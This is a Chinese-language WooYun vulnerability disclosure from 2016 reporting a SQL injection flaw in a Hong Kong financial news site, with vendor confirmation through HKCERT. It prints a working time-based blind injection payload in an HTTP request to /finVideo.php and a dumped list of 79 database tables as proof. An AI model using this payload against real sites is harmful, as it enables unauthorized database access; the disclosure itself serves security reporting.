当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0166438

漏洞标题:香港頭條日报頭條財經網注入漏洞(香港地區)

相关厂商:頭條日报

漏洞作者: 不败顽童

提交时间:2016-01-01 15:45

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-01: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

香港頭條日报-頭條財經網注入漏洞

详细说明:

GET /finVideo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&pageNo=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明:

屏幕快照 2015-12-30 下午9.07.07.png


屏幕快照 2015-12-30 下午10.23.32.png


Database: financeblog_uat
[79 tables]
+----------------------------------+
| finance_admusers1\t |
| fin_article_feedto_megahub |
| fin_articles |
| fin_articles_images |
| fin_articles_reports_mapping |
| fin_articles_writers_mapping |
| fin_blog_stock_vote |
| fin_blog_stock_vote_hot |
| fin_blog_stock_vote_hot_today |
| fin_blog_stock_vote_log |
| fin_blog_stock_vote_theme |
| fin_broker |
| fin_broker_upload_log |
| fin_currencies |
| fin_currencies_tips |
| fin_faq |
| fin_game_articles |
| fin_game_cold_knowledge_article |
| fin_game_images |
| fin_game_players |
| fin_game_statistics |
| fin_gen_programs |
| fin_gen_programs_log_201107 |
| fin_gen_programs_log_201108 |
| fin_gen_programs_log_201410 |
| fin_gen_programs_log_201411 |
| fin_gen_programs_log_201501 |
| fin_gen_programs_log_201504 |
| fin_iframes |
| fin_iframes_20130306 |
| fin_iread |
| fin_iread_images |
| fin_news |
| fin_news_feed_2013 |
| fin_news_feed_2014 |
| fin_news_feed_2015 |
| fin_news_feed_image_2013 |
| fin_news_feed_image_2014 |
| fin_news_feed_image_2015 |
| fin_news_feed_info_2013 |
| fin_news_feed_info_2014 |
| fin_news_feed_info_2015 |
| fin_news_feedto_st |
| fin_news_feedto_sthl |
| fin_news_images |
| fin_stockWarehouse |
| fin_stockWarehouse_config |
| fin_stockWarehouse_images |
| fin_stock_201105 |
| fin_stock_201106 |
| fin_stock_201107 |
| fin_stock_201108 |
| fin_stock_201204 |
| fin_stock_201209 |
| fin_stock_201210 |
| fin_stock_201211 |
| fin_stock_b4_20110511_1300 |
| fin_stocks |
| fin_stocks_favorite |
| fin_talk |
| fin_talk_comment |
| fin_talk_comment_fake |
| fin_talk_config |
| fin_talk_images |
| fin_varrantsGame_info |
| fin_video |
| fin_warrantsGame_userAnswer |
| fin_warrantsGame_userAnswer_fake |
| fin_wkt |
| fin_wktStock |
| fin_wkt_images |
| fin_writers |
| fin_xinhua |
| fin_xinhua_config |
| fin_xinhua_images |
| finance_adm_task |
| finance_admusers |
| finance_front_menu |
| finance_front_menu_20120816 |
+----------------------------------+

修复方案:

屏蔽特殊字符

版权声明:转载请注明来源 不败顽童@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-01-04 17:13

厂商回复:

已將事件通知有關機構

最新状态:

暂无


漏洞评价:

评价